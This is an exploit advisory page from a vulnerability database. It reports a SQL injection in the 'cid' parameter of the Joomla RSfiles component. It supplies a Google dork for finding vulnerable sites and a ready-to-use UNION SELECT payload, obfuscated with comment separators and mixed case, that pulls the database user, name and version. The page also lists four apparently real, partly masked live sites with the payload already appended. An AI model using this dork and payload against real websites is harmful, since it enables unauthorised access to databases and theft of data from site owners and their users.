Joomla Component RSfiles <= (cid) SQL injection Vulnerability

2013.03.18
Credit: ByEge
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:index.php?option=com_rsfiles

******************************************************************************* # Title : Joomla Component RSfiles <= (cid) SQL injection Vulnerability # Author : ByEge # Contact : http://byege.blogspot.com # Date : 18.03.2013 # S.Page : http://www.rsjoomla.com # Dork : inurl:index.php?option=com_rsfiles # DorkEx : http://www.google.com.tr/#hl=tr&sclient=psy-ab&q=inurl:index.php?option=com_rsfiles [[SQL Injection Test]]] http://www.theeXXeringguild.co.uk/?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- http://www.wcsaXX.com/?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- http://zootrXXX.com/joomla/?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- http://pctXXXg.au/?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- Vulnerability : ?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- ********************************* # Turkey.

References:

http://byege.blogspot.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top